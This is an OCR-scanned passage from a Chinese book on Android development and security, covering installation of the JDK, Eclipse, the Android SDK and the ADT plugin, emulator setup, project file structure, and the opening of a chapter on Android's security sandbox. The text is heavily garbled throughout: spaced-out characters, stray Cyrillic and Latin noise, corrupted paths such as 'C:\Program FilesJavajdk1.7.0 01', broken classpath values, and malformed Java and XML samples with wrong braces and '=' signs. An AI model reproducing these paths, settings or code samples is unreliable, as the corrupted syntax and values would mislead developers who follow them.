Configurations Configurations Windows x86 79.46 MB Š jdk-Tu1-windows-i586 exe 
Windows x64 8024MB Š jdi-Tut-windows-x64 exe 


图 2-2 JDK 下 载 页 面 


按钮 ， 如 图 2-4 所 示 。 


图 2-3 选择 Windows x86 版 本 
(4) 下 载 完 成 后 双击 下 载 的 .exe 文件 开始 进行 安装 ， 将 弹出 “安装 向 导 ” 对 话 框 ， 在 此 单 击 “ 下 一 步 ” 


G) 弹出 “安装 路 径 ” 对 话 框 ， 在 此 选择 文件 的 安装 路 径 ， 如 图 2-5 所 示 。 


Г Java(TM) SE Development Kit T Update i Tei E| 
=? Java ORACLE 


欢迎 使 用 Java(TM) SE Development Kit 7 Update 1 SEE F Z: 


Java(TM) SE Development Kit 7 Update 1 ЕЕЕ ЕВА, SHAS 
ЗЕРНЕ Е. ПАА. 
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图 2-4 “许可 证 协议 ”对 话 框 


ig! Јата (ТИ) SE == xj 
oracte 
请 从 下 面 的 列表 中 选择 要 安装 的 可 选 功能 。 安 装 完成 后 ， 您 可 以 使 用 "控制 面板 "中 的 ' 添 加/ 
岗 隐 程序 实用 程序 来 更 改修 选择 的 功能 
[| 
包含 源 代 码 的 小 程序 和 应 用 程 
序 的 演示 和 样 倒 。 演 示 程序 和 
ipie 36 ME 的 硬盘 驱动 器 
jg. 
安装 到 : | 
C:\Program Files David. 7.0. 01V BR)... 
< 上 -5 四 mis 


图 2-5 “安装 路 径 ” 对 话 框 


(6) 在 此 设置 安装 路 径 为 ENdk1.7.0 01\， 然 后 单 击 “ 下 一 步 ” 按 钮 开始 在 安装 路 径 下 解压 缩 下 载 的 文 


件 ， 如 图 2-6 所 示 。 


(7) 解压 完成 后 弹出 “目标 文件 夹 ” 对 话 框 ， 在 此 选择 要 安装 的 位 置 ， 如 图 2-7 所 示 。 


È Java (Tm) SR Deve 


ORACLE 


ж: 
ШИИ 


图 2-6 解压 缩 下 载 的 文件 


(Java 安装 - ARK 
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图 2-7 “目标 文件 夹 ”对 话 框 


(8) 单 击 “ 下 一 步 ” 按 钮 后 开始 正式 安装 ， 如 图 2-8 所 示 。 
O) 完成 后 弹出 “完成 ”对 话 框 ， 单 击 “ 完 成 ”按钮 后 完成 整个 安装 过 程 ， 如 图 2-9 所 示 。 
fg Java (Т8) SE Development Kit 7 Vj 


ORACLE 


3 Billion Devices Run Java 


ORACLE 


Java(TM) SE Development Kit 7 Update 1 已 成 功 安装 


产品 注册 是 免费 的 ， 您 将 区 得 如 下 增 信服 务 : 

二 区 得 新 版 本 、 修 补 程序 和 更 新 的 通知 服务 
ESSI Orade янва. БЕШЕНЕ 
奖 得 对 早期 版 本 和 文档 的 访问 权限 


Sidi ae EIE RI BSF 
不 注册 ， 则 不 保存 以 上 信息 。 


入 式 的 更 多 信息 ， 计 本 见 产 品 


广内 信息 To. 


同时 显示 DK 产品 注册 表单 。 如 果 您 


图 2-8 继续 安装 


图 2-9 完成 安装 


aum 


10 Android RSs were 
完成 安装 后 可 以 检测 是 否 安装 成 功 ， 检 测 方法 是 依次 选择 “开始 ”| “运行 ”命令 ， 在 运行 框 中 输入 
l 


cmd 并 按 下 Enter 键 ， 在 打开 的 CMD 窗口 中 输入 java -version， 如 果 显 示 如 图 2-10 所 示 的 提示 信息 ， 则 说 


明 安装 成 功 。 


图 2-10 CMD 窗口 

如 果 检 测 到 没有 安装 成 功 ， 需 要 将 其 目录 的 绝对 路 径 添加 到 系统 的 PATH 中 ， 具 体 做 法 如 下 所 示 。 
CL) 右 击 并 依次 选择 “我 的 电脑 ”| “属性 ”| “高 级 ”命令 ， 单 击 下面 的 “环境 变量 ”按钮 ， 在 下 
面 的 “系统 变量 ”处 单 击 “ 新 建 ”按钮 ， 在 变量 名 处 输入 JAVA_HOME， 变 量 值 处 输入 刚才 的 目录 ， 例 如 


设置 为 C:\Program FilesJavajdk1.7.0 01， 如 图 2-11 所 示 。 
(2) 再 次 新 建 一 个 变量 ， 名 为 classpath， 其 变量 值 如 下 所 示 。 


3%JAVA_HOME%llib/rt.jar;%JAVA_HOME%llib/tools.jar 
单 击 “确定 ” 按 钮 找到 PATH 的 变量 ， 双 击 变量 或 单 击 “ 编 辑 ” 按 钮 ， 在 变量 值 最 前 面 添加 如 下 值 。 


%JAVA_HOME%/bin; 
具体 如 图 2-12 所 示 。 
TEEN KIES 
sw [wom OO saso Шо O 
mo: F торая Files\Java\jdkt. T 001 | жашо: Гьл заг ATAVA OWE Tib/ tools jar 
ma | [ww] we | 
图 2-12 编辑 系统 变量 


图 2-11 新 建 系统 变量 
G) 再 依次 选择 “开始 ”| “运行 ”命令 ， 在 运行 框 中 输入 ста 并 按 Enter 键 ， 在 打开 的 CMD 窗口 
中 输入 java -version， 如 果 显 示 如 图 2-10 所 示 的 提示 信息 ， 则 说 明 安 装 成 功 。 
SEB: 上 述 变 量 设置 中 ， 是 按照 笔者 本 人 的 安装 路 径 设置 的 ， 笔 者 安装 的 JDK 的 路 径 是 C:\Program 


FilesJavajdk1.7.0 02. 


23 获取 并 安装 Eclipse 和 Android SDK 


ER 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 2 章 \ 获 取 并 安装 Eclipse 和 Android SDK.avi 
在 安装 好 JDK 后 ， 接 下 来 需要 安装 Eclipse 和 Android SDK。Eclipse 是 进行 Android 应 用 开发 的 一 个 集 
成 工具 ， 而 Android SDK 是 开发 Android 应 用 程序 所 必须 具备 的 框架 。 在 Android 官方 公布 的 最 新 版 本 中 ， 
已 经 将 Eclipse 和 Android SDK 这 两 个 工具 进行 了 集成 ， 一 次 下 载 即 可 同时 获得 这 两 个 工具 。 
获取 并 安装 Eclipse 和 Android SDK 的 具体 步骤 如 下 所 示 。 
(1) 登录 Android 的 官方 网 站 http://developer.android.com/index.html, WP 2-13 所 示 。 


(2) 单 击 中 部 的 Get the SDK 超 链接 ， 如 图 2-14 所 示 。 
(3) 在 弹出 的 新 页 面 中 单 击 Download the SDK 按钮 ， 如 图 2-15 所 示 。 
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图 2-13 Android 的 官方 网 站 


В 2-14 Hi Get the SDK 超 链接 
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Setting Up the ADT 
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The Android SDK provides you the API libraries and 
developer tools necessary to build test, and debug 
apps for Android. 


1 you're а new Android developer. we recommend you 
download the ADT Bundle to quickly start developing 
арра includes the essential Android SDK 
‘components and aversion of the Eclipse IDE with 
built-in ADT (Android Developer Tools) 10 streamline 
Your Android app development 


Win a single download the ADT Bundle includes 


everything you need to begin developing apos: Download the SDI 
* Eclipse + ADT plugin. i - 


* Android SOK Tools 


图 2-15 单 击 Download the SDK 按钮 


(4) 在 弹出 的 Get the Android SDK 界面 中 选中 I have read and agree with the above terms and conditions 
复 选 框 ， 然 后 在 下 面 的 单 选 按钮 中 选择 系统 的 位 数 。 例 如 ， 笔 者 的 机 器 是 32 位 的 ， 所 以 选中 32-bit 单 选 按 


钮 ， 如 图 2-16 所 示 。 


Get the Android SDK 
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2-16 Get the Android SDK 界面 
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(5) 单 击 图 2-16 中 的 医护 钮 后 开始 下 载 工作 ， 下 载 的 目标 文件 是 一 个 


如 图 2-17 所 示 。 
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DERRSS 

回 T 载 守成 后 自动 运行 
ORARET 
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Гатти -] тя 
图 2-17 开始 下 载 目标 文件 压缩 包 
(6) 将 下 载 得 到 的 压缩 包 进行 解压 ， 解 压 后 的 目录 结构 如 图 2-18 所 示 。 


D eclipse 2014/10/14 8:51 хня 
Ë sdk 2014/10/18 16:28 Ж 
[ET SDK Manager. exe 2014/1/3 3:24 应 用 程序 216 КВ 


图 2-18 解压 后 的 目录 结构 


E 缩 包 ， 


由 此 可 见 ，Android 官方 已 经 将 Eclipse 和 Android SDK 实现 了 集成 。 双 击 eclipse 目录 中 的 eclipse.exe 


可 以 打开 Eclipse， 界 面 效 果 如 图 2-19 所 示 。 
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2-19 打开 Eclipse 后 的 界面 效果 


(7) 打开 Android SDK 的 方法 有 两 种 ， 第 一 种 是 双击 下 载 目 录 中 的 SDK Manager.exe 文件 ， 第 二 种 是 


在 Eclipse 工具 栏 中 单 击 力图 标 。 打 开 后 的 效果 如 图 2-20 所 示 。 
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图 2-20 打开 Android SDK 后 的 界面 效果 
注意 : 快速 安装 Android SDK 的 方法 。 


通过 Android SDK Manager 在 线 安装 的 速度 非常 慢 ， 而 且 有 时 容易 挂 掉 。 其 实 可 以 先 从 网 络 中 寻找 到 
SDK 资源 ， 用 迅雷 等 下 载 工具 下 载 ， 将 其 放 到 指定 目录 后 再 安装 。 具 体 方法 是 先 下载 可 更 新 的 android- 
sdk-windows， 然 后 在 android-sdk-windows 下 双击 setup.exe， 在 更 新 的 过 程 中 会 发 现 安装 Android SDK 的 速 
BERE 1kib/s， 此 时 打开 迅雷 ， 分 别 输 入 下 面 的 地 址 : 

https://dl-ssl.google.com/android/repository/platform-tools r05-windows.zip 

https://dl-ssl.google.com/android/repository/docs-3.1 r02-linux.zip 
https://dl-ssl.google.com/android/repository/android-2.2 r02-windows.zip 
https://dl-ssl.google.com/android/repository/android-2.3.3 r02-linux.zip 
https://dl-ssl.google.com/android/repository/android-2.1 r02-windows.zip 
https://dl-ssl.google.com/android/repository/samples-2.3.3 r02-linux.zip 
https://dl-ssl.google.com/android/repository/samples-2.2 r02-linux.zip 
https://dl-ssl.google.com/android/repository/samples-2.1 r02-linux.zip 
https://dl-ssl.google.com/android/repository/compatibility r02.zip 
https://dl-ssl.google.com/android/repository/tools r12-windows.zip 
https://dl-ssl.google.com/android/repository/google apis-10 r02.zip 
https://dl-ssl.google.com/android/repository/android-2.3.1 r02-linux.zip 
https://dl-ssl.google.com/android/repository/usb driver r02-windows.zip 
https://dl-ssl.google.com/android/repository/googleadmobadssdkandroid-4. 1.0.zip 
https://dl-ssl.google.com/android/repository/market licensing-r01.zip 
https://dl-ssl.google.com/android/repository/market billing r01.zip 
https://dl-ssl.google.com/android/repository/google apis-8 r02.zip 
https://dl-ssl.google.com/android/repository/google apis-7 r01.zip 
https://dl-ssl.google.com/android/repository/google apis-9 r02.zip 


可 以 继续 根据 自己 开发 要 求 选择 不 同 版 本 的 API 
下 载 完 后 将 其 复制 到 android-sdk-windows/Temp 目录 下 ， 然 后 再 运行 setup.exe， 选 中 需要 的 API 选项 ， 
会 发 现 马 上 就 安装 好 了 。 要 注意 保留 原始 文件 ， 因 为 放 在 temp 目录 下 的 文件 安装 完成 后 会 立即 消失 。 


9) 


2.4 安装 ADT 


Фи 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 2 章 \ 安 装 ADT.avi 
Android 为 Eclipse 定制 了 一 个 专用 插件 Android Development Tools (ADT) ， 此 插件 为 用 户 提供 了 一 
个 强大 的 开发 Android 应 用 程序 的 综合 环境 。ADT 扩展 了 Eclipse 的 功能 ， 可 以 让 用 户 快速 建立 Android 项 
目 ， 创 建 应 用 程序 界面 。 要 安装 Android Development Tools plug-in， 需 要 首先 打开 Eclipse IDE， 然 后 进行 
如 下 操作 。 
(1) 打开 Eclipse 后 ， 在 菜单 栏 中 选择 Help | Install New Software 命令 ， 如 图 2-21 所 示 。 
(20 在 弹出 的 对 话 框 中 单 击 Add 按钮 ， 如 图 2-22 所 示 。 


图 2-21 添加 插件 图 2-22 添加 插件 


(3) 在 弹出 的 Add Site 对 话 框 中 分 别 输入 名 字 和 地 址 ， 名 字 可 以 自己 命名 , 例如 123, 但 是 在 Location 
中 必须 输入 插件 的 网 络 地 址 http://dl-ssl.google.com/Android/eclipse/， 如 图 2-23 所 示 。 
(4) 单 击 OK 按钮 ， 此 时 在 Install 界面 将 会 显示 系统 中 可 用 的 插件 ， 如 图 2-24 所 示 。 


Er 0 $ 5 w?009;1181123-20604 
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图 2-23 设置 地 址 图 2-24 插件 列表 
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(5) 选中 Android DDMS 和 Android Development Tools 复 选 框 , 然后 单 击 Next 按钮 来 到 安装 界面 ， 如 
2-25 所 示 。 


{рулуп Connector: Bugzilla 
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图 2-25 插件 安装 界面 


(6) 选中 Iacceptthe terms of the license agreement 单 选 按钮 , "fit; Finish 按钮 开始 进行 安装 ， 如 图 2-26 
所 示 。 


W Install (Blocked. The user operati... for background work to complete.) 


Fetching com. android ide. eclipse. a... adt. 0.9. 9, v201009221407-60953. jar 


图 2-26 开始 安装 


注意 : 在 上 述 步 骤 中 ， 可 能 会 发 生计 算 插件 占用 资源 的 情况 ， 过 程 有 些 慢 。 完 成 后 会 提示 重启 Eclipse 
来 加 载 插件 ， 重 启 后 插件 可 用 ， 并 且 不 同 版 本 的 Eclipse 安装 插件 的 方法 和 步骤 是 不 同 的 ， 但 是 
都 大 同 小 异 ， 读 者 可 以 根据 操作 提示 完成 安装 。 


25 验证 设置 


E 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 2 章 \ 验 证 设置 .avi 
本 章 前 面 内 容 , 已 经 讲解 了 搭建 安装 Android 基本 环境 的 知识 ,在 完成 安装 之 后 ,还 需要 一 些 具体 验证 
和 设置 工作 ， 本 节 将 详细 讲解 验证 和 设置 Android 开发 环境 的 基本 知识 。 


2.5.4 15 Android SDK Home 


当 完 成 上 述 插件 安装 工作 后 ,此 时 还 不 能 使 用 Eclipse 创建 Android 项 目 ,还 需要 在 Eclipse 中 设置 Android 
SDK 的 主 目录 。 
(1) 打开 Eclipse， 在 菜单 中 依次 选择 Window | Preferences 命令 ， 如 图 2-27 所 示 。 


图 2-27 Preferences 命令 


(2) 在 弹出 的 界面 左 侧 可 以 看 到 Android 项 ， 选 中 Android 后 ， 在 右 侧 设 定 Android SDK 所 在 目录 
SDK Location， 单 击 OK 按钮 完成 设置 ， 如 图 2-28 所 示 。 
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图 2-28 Е SDK Location 


2.5.0 ”验证 开发 环境 


经 过 前 面 步 又 的 讲解 一 个 基本 的 Android 开发 环境 算是 搭建 完成 了 .都 说 实践 是 检验 真理 的 唯一 标准 ， 
下 面 通过 新 建 一 个 项 目 来 验证 当前 的 环境 是 否 可 以 正常 工作 。 


@ 


(1) 打开 Eclipse， 在 菜单 中 依次 选择 File | New | Project 命令 ， 在 弹出 的 对 话 框 中 可 以 看 到 Android 
类 型 的 选项 ， 如 图 2-29 所 示 。 


2-29 HEMA 


(2) 在 图 2-29 选择 Android, Hit Next 按钮 后 打开 New Android Application 对 话 框 ， 在 对 应 的 文本 框 
中 输入 必要 的 信息 ， 如 图 2-30 所 示 。 
(3) 单 击 Finish 按钮 后 Eclipse 会 自动 完成 项 目的 创建 工作 ， 最 后 会 看 到 如 图 2-31 所 示 的 项 目 结构 。 
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图 2-30 New Android Application 对 话 框 2-31 项 目 结构 


2.6 Android 虚拟 设备 ( AVD ) 


E 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 2 章 \Android MARS (AVD) avi 
众所周知 ， 程 序 开发 后 需要 调试 ， 只 有 经 过 调试 之 后 才能 知道 程序 是 否 能 够 正确 运行 。 作 为 一 款 手机 


®© 


ROS TREE 


系统 ， 怎 么 样 才能 在 计算 机 平台 上 调试 Android 程序 呢 ? 不 用 担心 , 谷歌 提供 了 模拟 器 来 解决 这 一 问题 。 所 
谓 模拟 器 ， 就 是 指 在 计算 机 上 模拟 Android 系统 ， 可 以 用 这 个 模拟 器 来 调试 并 运行 开发 的 Android 程序 。 开 
发 人 员 不 需要 一 个 真实 的 Android 手机 ， 只 通过 计算 机 即 可 模拟 一 个 手机 ， 运 行 并 检测 开发 的 程序 。 


2.6.1 创建 AVD 


AVD 全 称 为 Android 虚拟 设备 (Android Virtual Device), 每 个 AVD 模拟 了 一 套 虚 拟 设备 来 运行 Android 
平台 ， 这 个 平台 至 少 要 有 自己 的 内 核 、 系 统 图 像 和 数据 分 区 ， 还 可 以 有 自己 的 SD 卡 和 用 户 数据 以 及 外 观 显 
示 等 。 

当然 Android 模拟 器 不 能 完全 蔡 代 真 机 ， 具 体 来 说 有 如 下 差异 。 
模拟 器 不 支持 呼叫 和 接听 实际 来 电 ， 但 可 以 通过 控制 台 模 拟 电 话 呼叫 〈 呼 入 和 呼出 ) 。 
模拟 器 不 支持 USB 连 接 。 
模拟 器 不 支持 相机 /视频 捕捉 。 
模拟 器 不 支持 音频 输入 〈 捕 捉 ) ， 但 支持 输出 〈 重 放 ) 。 
模拟 器 不 支持 扩展 耳机 。 
模拟 器 不 能 确定 连接 状态 。 
模拟 器 不 能 确定 电池 电量 水 平和 交流 充电 状态 。 
模拟 器 不 能 确定 SD 卡 的 插入 /弹出 。 
模拟 器 不 支持 蓝牙 。 
创建 АУР 的 基本 步骤 如 下 所 示 。 

(1) 单 击 Eclipse 菜单 中 的 总 按钮， 如 图 2-32 所 示 。 
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(2) 在 弹出 的 Android Virtual Device САУР) Manager 窗口 中 选择 Android Virtual Device 选项 卡 ， 如 
图 2-33 所 示 。 


图 2-33 Android Virtual Device CAVD) Manager 窗口 
在 该 选项 卡 下 的 列表 中 列 出 了 当前 已 经 安装 的 АУР 版 本 ， 可 以 通过 右 侧 的 按钮 来 创建 、 删 除 或 修改 
AVD。 主 要 按钮 的 具体 说 明 如 下 所 示 。 
[xe] 创建 一 个 新 的 AVD， 单 击 此 按钮 ， 在 弹出 的 界面 中 可 以 创建 一 个 新 AVD， 如 图 2-34 所 示 。 
: 修改 已 经 存在 的 AVD。 
[me] 训 除 已 经 存在 的 AVD。 
De] 启动 一 个 AVD 模 拟 器 。 
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2-34 新 建 AVD 界面 


Android RRP SOR BTR 


注意 : 可 以 在 CMD 中 创建 或 删除 AVD， 例 如 ， 可 以 按照 如 下 CMD 命 令 创建 一 个 AVD。 


android create avd —name <your_avd_name> --target <targetID> 
其 中 your_avd_name 是 需要 创建 的 AVD 的 名 字 ， 在 CMD 窗口 界面 中 如 图 2-35 所 示 。 


图 2-35 CMD 界面 
2.6.2 zh AVD 


对 于 Android 程序 的 开发 者 来 说 ， 模 拟 器 的 推出 在 开发 和 测试 上 带 来 了 很 大 的 便利 。 无 论 在 Windows 
下 还 是 Linux F, Android 模拟 器 都 可 以 顺利 运行 ,并 且 官方 提供 了 Eclipse 插件 ,可 以 将 模拟 器 集成 到 Eclipse 
的 IDE 环境 。Android SDK 中 包含 的 模拟 器 的 功能 非常 齐全 ， 电 话 本 、 通 话 等 功能 都 可 正常 使 用 〈 当 然 没 
办 法 真 的 从 这 里 打 电 话 ) ， 甚 至 其 内 置 的 浏览 器 和 Maps 都 可 以 联网 。 用 户 可 以 使 用 键盘 输入 ， 或 用 鼠标 单 
击 模拟 器 按键 输入 ， 甚 至 还 可 以 使 用 鼠标 单 击 、 拖 动 屏幕 进行 操纵 。 模 拟 器 在 计算 机 上 模拟 运行 的 效果 如 
图 2-36 所 示 。 


图 2-36 ”模拟 器 
2.6.3 Ж АМО 模拟 器 的 基本 流程 


在 调试 时 需要 启动 AVD 模拟 器 ， 启 动 AVD su игн 


CD 选择 图 2-33 列表 中 名 为 first 的 AVD, їнї | = 按钮 后 弹出 Launch Options 对 话 框 ， 如 图 2-37 
所 示 。 
(2) 单 击 Launch 按钮 后 将 会 运行 名 为 first 的 模拟 器 ， 运 行 界面 效果 如 图 2-38 所 示 。 
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图 2-37 Launch Options 对 话 框 图 2-38 ”模拟 运行 成 功 


2.7 分 析 Android 应 用 工程 文件 


бн 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 2 章 \ 分 析 Android 应 用 工程 文件 .avi 
讲解 完 Android 的 整体 结构 之 后 ， 接 下 来 开始 讲解 Android 工程 文件 的 组 成 。 顶 层 的 Android 应 用 程序 
通常 使 用 EclipsetJava 组 合 实现 ， 在 Eclipse 工程 中 ， 一 个 基本 的 Android 项 目的 目录 结构 如 图 2-39 所 示 。 


I$ Package Explorer 23 zn 


EB) first.a 


© drawable-hdpi 
© drawable-ldpi 
© dravable-ndpi 
25 drawable-xhápi 


Ì strings. xml 
КЇ Androi Manifest. ха] 


B project. properties 


图 2-39 Android 应 用 工程 文件 组 成 
在 本 节 的 内 容 中 ， 将 详细 讲解 Android 应 用 程序 工程 文件 中 各 个 组 成 部 分 的 具体 信息 。 


М. 系统 安全 和 反 编译 实 点 


2.7.1 src 程序 目录 


src 目录 中 保存 了 开发 人 员 编写 的 程序 文件 ， 和 一 般 的 Java MAHÉ, sre 目录 下 保存 的 是 项 目 所 有 包 
及 源 文件 〈java) ，res 目录 下 包含 了 项 目 中 的 所 有 资源 。 例 如 ， 程 序 图 标 Cdrawable) 、 布 局 文件 Clayout) 
MÆ (values) $. PARE, Æ Java 项 目 中 没有 gen 目录 ， 也 没有 每 个 Android 项 目 都 必须 有 的 
AndroidManifest.xml 文件 。 

java 格式 文件 是 在 建立 项 目 时 自动 生成 的 ， 这 个 文件 是 只 读 模 式 ， 不 能 更 改 。R.java 文件 是 定义 该 项 
目 所 有 资源 的 索引 文件 。 例 如 ， 下 面 是 某 项 目 中 Rjava 文件 的 代码 。 

package com.yarin.Android.HelloAndroid; 

public final class R{ 

public static final class attr ( 


public static final class drawable ( 
public static final int icon=0x7f020000; 


public static final class layout ( 
public static final int main=0x7f030000; 


} 

public static final class string { 
public static final int app_name=0x7f040001; 
public static final int hello=Ox7f040000; 

} 


} 

在 上 述 代码 中 定义 了 很 多 常量 ， 并 且 这 些 常量 的 名 字 都 与 res 文件 夹 中 的 文件 名 相同 ， 这 再 次 证 明 java 
文件 中 所 存储 的 是 该 项 目 所 有 资源 的 索引 。 有 了 这 个 文件 ， 在 程序 中 使 用 资源 将 变 得 更 加 方便 ， 可 以 很 快 
地 找到 要 使 用 的 资源 ， 由 于 这 个 文件 不 能 被 手动 编辑 ， 所 以 当 在 项 目 中 加 入 了 新 的 资源 时 ， 只 需要 刷新 一 
下 该 项 目 ，.java 文件 便 自 动 生 成 了 所 有 资源 的 索引 。 


2.7.2 设置 文件 AndroidManifest.xml 


AndroidManifest.xml 文件 是 一 个 控制 文件 , 其 中 包含 了 该 项 目 中 所 使 用 的 Activity. Service 和 Receiver. 
例如 ， 下 面 是 某 项 目 中 AndroidManifest.xml 文件 的 代码 。 
<?xml version="1.0" encoding="utf-8"?> 
«manifest xmins:android="http://schemas.android.com/apk/res/android" 
package-"com.yarin.Android.HelloAndroid" 
android:versionCode="1" 
android:versionName="1.0"> 
«application android:icon="@drawable/icon" android:label="@string/app_name"> 
«activity android:name-".HelloAndroid" 
android:label="@string/app_name"> 
<intent-filter> 
<action android:name="android.intent.action.MAIN" /> 
«category android:name-"android.intent.category.LAUNCHER" /> 
</intent-filter> 
</activity> 
</application> 
<uses-sdk android:minSdkVersion="9" /> 
</manifest> 


@ 
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在 上 述 代码 中 ，intent-filters 描述 了 Activity 启动 的 位 置 和 时 间 。 每 当 一 个 Activity (或 者 操作 系统 ) 要 
执行 一 个 操作 时 ， 将 创建 一 个 Intent 对 象 ， 这 个 Intent 对 象 可 以 描述 想 做 什么 ， 想 处 理 什么 数据 、 数 据 的 类 
型 以 及 一 些 其 他 信息 。Android 会 和 每 个 Application 所 暴露 的 intent-filter 的 数据 进行 比较 ， 找 到 最 合适 的 
Activity 来 处 理 调用 者 所 指定 的 数据 和 操作 。 下 面 仔细 分 析 AndroidManifestxml 文件 ， 如 表 2-2 所 示 。 

表 2-2 AndroidManifest.xml 分 析 
$ BR it 
manifest 根 节点 ， 描 述 了 package 中 所 有 的 内 容 
包含 命名 空间 的 声明 。xmlns:android=http://schemas.android.com/apk/res/android， 使 得 Android 
中 各 种 标准 属性 能 在 文件 中 使 用 ， 提 供 了 大 部 分 元 素 中 的 数据 


xmlns:android 


Package 声明 应 用 程序 包 
包含 package 中 application 级 别 组 件 声明 的 根 节点 。 此 元 素 也 可 包含 application 的 一 些 全 局 和 
application 默认 的 属性 ， 例 如 标签 、icon、 主 题 、 必 要 的 权限 等 。 一 个 manifest 能 包含 零 个 或 一 个 此 元 素 
(不 能 大 于 一 个 ) 


android:icon 应 用 程序 图 标 
android:label 应 用 程序 名 字 
activity 是 与 用 户 交互 的 主要 工具 ， 是 用 户 打 开 一 个 应 用 程序 的 初始 页 面 ， 大 部 分 被 使 用 到 的 其 

他 页 面 也 由 不 同 的 activity 实现 ， 并 声明 在 另外 的 activity 标记 中 。 注意 ,每 一 个 activity 必须 有 
activity 一 个 <activity> 标 记 对 应 , 无 论 它 给 外 部 使 用 或 是 只 用 于 自己 的 package 中 。 如 果 一 个 activity i£ 
有 对 应 的 标记 ,将 不 能 运行 .另外 , 为 了 支持 运行 时 查找 activity, 可 包含 一 个 或 多 个 <intent-filter> 
元 素来 描述 activity 所 支持 的 操作 

android:name 应 用 程序 默认 启动 的 activity 
声明 了 指定 的 一 组 组 件 支持 的 Intent 值 ， 从 而 形成 了 Intent Filter。 除 了 能 在 此 元 素 下 指定 不 同 


intent filter | 类 型 的 值 ， 属 性 也 能 放 在 这 里 来 描述 一 个 操作 所 需 的 唯一 的 标签 、icon 和 其 他 信息 
action 组 件 支持 的 Intent action 

category 组 件 支持 的 Intent Category。 这 里 指定 了 应 用 程序 默认 启动 的 activity 

uses-sdk 该 应 用 程序 所 使 用 的 SDK 版 本 


273 ”常量 定义 文件 


下 面 介绍 在 资源 文件 中 对 常量 的 定义 ， 例 如 ， 文 件 String.xml 的 代码 如 下 所 示 。 
<?xml version="1.0" encoding="utf-8"?> 
<resources> 
<string name="hello">Hello World, HelloAndroid!</string> 
<string name="app_name">HelloAndroid</string> 
</resources> 


上 述 常 量 定义 文件 的 代码 非常 简单 ， 只 定义 了 两 个 字符 串 资源 ， 请 不 要 小 看 上 面 的 儿 行 代码 ， 其 中 的 
字符 直接 显示 在 手机 屏幕 中 ， 就 像 动态 网 站 中 的 HTML 一 样 。 
2.7.4 Ul 布局 文件 


布局 (layout) 文件 一 般 位 于 res\layout\main.xml 目录 中 ， 通 过 其 代码 能 够 生成 一 个 显示 界面 ， 例 如 下 


面 的 代码 。 
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<?xml version="1.0" encoding="utf-8"?> 
<LinearLayout xmlns:android-"http://schemas.android.com/apk/res/android" 
android:orientation="vertical" 


android:layout_width="fill_ parent" 
android:layout_height="fill_ parent" 
> 


<TextView 


android:layout_width="fill_ parent" 
android:layout_height="wrap_content" 
android:text="@string/hello" 

> 


</LinearLayout> 
在 上 述 代码 中 ， 有 以 下 几 个 布局 和 参数 。 


口 
口 
口 
口 
口 


<LinearLayout></LinearLayout>: 在 此 标签 中 ， 所 有 元 件 都 是 由 上 到 下 排 成 的 。 
android:orientation: 表示 介质 的 版 面 配置 方式 是 从 上 到 下 垂直 地 排列 其 内 部 的 视图 。 
android:layout width: 定义 当前 视图 在 屏幕 上 所 占 的 宽度 ，fill_parent 即 填充 整个 屏幕 。 
android:layout_height: 定义 当前 视图 在 屏幕 上 所 占 的 高 度 ，fil_parent 即 填充 整个 屏幕 。 
wrap content: 随 着 文字 栏 位 的 不 同 而 改变 视图 的 宽度 或 高 度 。 


在 上 述 布局 代码 中 ， 使 用 了 一 个 TextView 来 配置 文本 标签 Widget (构件 ) ， 其 中 设置 的 属性 
android:layout width 为 整个 屏幕 的 宽度 ，android:layout_height 可 以 根据 文字 来 改变 高 度 ， 而 android:text 则 
设置 了 这 个 TextView 要 显示 的 文字 内 容 , 这 里 引用 了 @string 中 的 hello 字符 串 , 即 String.xml 文件 中 的 hello 
所 代表 的 字符 串 资源 。hello 字符 串 的 内 容 "Hello World, HelloAndroid!" 即 是 在 HelloAndroid 项 目 运行 时 看 到 
的 字符 串 。 
注意 : 上 面 介 绍 的 文件 只 是 主要 文件 ， 在 项 目 中 需要 自行 编写 。 另 外 ， 在 项 目 中 还 有 很 多 其 他 文件 ， 

这 些 文件 很 少 需要 编写 的 ， 所 以 在 此 就 不 进行 讲解 了 。 


第 2 篇 系统 安全 架构 篇 


第 3 章 Android 系统 的 安全 机 制 
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第 3 章 Android 系统 的 安全 机 制 


众所周知 ，Android 系统 是 一 个 开源 的 智能 设备 系统 ， 因 为 架构 开放 、 移 动 计 算 和 网 络 互联 能 力 强大 的 
原因 ， 很 容易 存在 被 攻击 的 安全 隐患 。 为 了 确保 信息 安全 ，Android 系统 本 身 需 要 打造 一 个 安全 的 架构 规范 
机 制 ， 并 让 这 个 机 制 贯穿 整个 系统 架构 的 内 核 、 虚 拟 机 、 应 用 框架 层 以 及 应 用 层 等 各 个 环节 中 。 只 有 这 样 ， 
才能 保证 在 Android 平台 上 保护 用 户 数据 、 应 用 程序 、 设 备 和 网 络 信息 的 安全 性 。 本 章 将 详细 讲解 Android 
系统 安全 机 制 的 基本 知识 ， 为 读者 学 习 本 书后 面 的 知识 打下 基础 。 


3.1 Android 安全 机 制 概述 


EAI 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 3 章 \Android 安全 机 制 概述 .avi 

根据 Android 系统 架构 分 析 ， 其 安全 机 制 是 在 Linux 操作 系统 的 内 核 安全 机 制 基础 之 上 的 ， 这 主要 体现 
在 如 下 两 个 方面 。 

(1) 使 用 进程 沙 箱 机 制 来 隔离 进程 资源 。 

(2) 通过 Android 系统 独 有 的 内 存 管 理 技术 ， 安 全 高 效 地 实现 进程 之 间 的 通信 处 理 。 

上 述 安全 机 制 策略 十 分 适合 于 嵌入 式 移动 终端 处 理 器 设备 ， 因 为 这 可 以 很 好 地 兼顾 高 性 能 与 内 存 容 量 
的 限制 。 另 外 ， 因 为 Android 应 用 程序 是 基于 Framework 应 用 框架 的 ， 并 且 使 用 Java 语 行 编写 ， 最 后 
运行 于 Dalvik VM (Android 虚拟 机 ) 。 同 时 ，Android 的 底层 应 用 由 C/C++ 语言 实现 ， 以 原生 库 形式 直接 运 
行 于 操作 系统 的 用 户 空间 。 这 样 ，Android 应 用 程序 和 Dalvik VM 的 运行 环境 都 被 控制 在 “进程 沙 箱 ”环境 
下 。“ 进 程 沙 箱 ” 是 一 个 完全 被 隔离 的 环境 ， 自 行 拥有 专用 的 文件 系统 区 域 ， 能 够 独立 共享 私有 数据 ， 如 
图 3-1 所 示 。 


